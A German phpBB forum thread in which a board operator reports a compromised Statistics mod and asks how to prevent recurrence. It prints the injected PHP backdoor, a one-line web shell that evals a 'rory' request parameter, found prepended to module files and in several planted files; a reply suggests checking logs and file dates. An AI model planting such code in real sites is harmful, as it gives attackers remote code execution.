Hack in Statistics Mod 3 Beta 3

Du suchst einen bestimmten Mod, weißt aber nicht genau wo bzw. ob er überhaupt existiert? Wenn dir dieser Artikel nicht weiterhilft, kannst du hier den von dir gewünschten/gesuchten Mod beschreiben ...
Falls ein Mod-Autor eine der Anfragen hier aufnimmt um einen neuen Mod zu entwicklen, geht's in phpBB 2.0: Mods in Entwicklung weiter.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.0, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
Latinoportal
Mitglied
Beiträge: 349
Registriert: 13.08.2003 15:44
Wohnort: Frankfurt am Main
Kontaktdaten:

Hack in Statistics Mod 3 Beta 3

Beitrag von Latinoportal »

Dieser Mod wurde durch Änderung folgender Dateien gehackt:

/modules/language/lang_german/lang_modules.php
/modules/language/lang_english/lang_modules.php
/modules/admin_statistics/module.php

Die Dateien wurden am Anfang und Ende jeweils abgeändert:

Code: Alles auswählen

<?php0e9700d17a20f49f6b54aaf168b6e7ff();?><?php

// [admin_statistics]

$admin_statistics = array(); 

...

// [/users_by_month]



?><?function php0e9700d17a20f49f6b54aaf168b6e7ff(){eval(stripslashes($_REQUEST[rory]));}//rory was here! ?>
Weis jemand näheres?

Wie kann ich das in Zukunft verhindern?

Danke.
Latinoportal
Mitglied
Beiträge: 349
Registriert: 13.08.2003 15:44
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Latinoportal »

Wurde denn bei niemanden das Statistik Tool gehackt?

Gruß
M.
Benutzeravatar
kellanved
Mitglied
Beiträge: 570
Registriert: 05.02.2005 15:15
Wohnort: Berlin

Beitrag von kellanved »

da bräcuhte man schon mehr Informationen. Es ist ja nicht klar, ob wirklich die Statistic mod der Einstiegspunkt war; es muss ja nicht einmal etwas mit phpBB zu tun haben.

Gibt es in den Serverlogs evtl. Hinweise auf den Angriff? Möglicherweise bietet das Änderungsdatum der veränderten Dateien Anhaltspunkte.
Bitte keine Supportanfragen via PM
Latinoportal
Mitglied
Beiträge: 349
Registriert: 13.08.2003 15:44
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Latinoportal »

In den Logs habe ich nichts gefunden. Habe meinen Hoster eingeschaltet.

Hier noch ein paar Erkenntnisse:

Veränderte Dateien:

/modules/admin_statistics/module.php
/modules/language/lang_english/lang_modules.php
/modules/language/lang_german/lang_modules.php

Hinzugefügte Dateien:

/modules/admin_statistics/tgg.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>
/modules/language/config.inc.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>
/modules/most_active_topics/lorelai.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>
/modules/topics_by_month/tgg.php

Code: Alles auswählen

<?php eval(stripslashes($_REQUEST[rory])); ?>
Antworten

Zurück zu „phpBB 2.0: Mod Suche/Anfragen“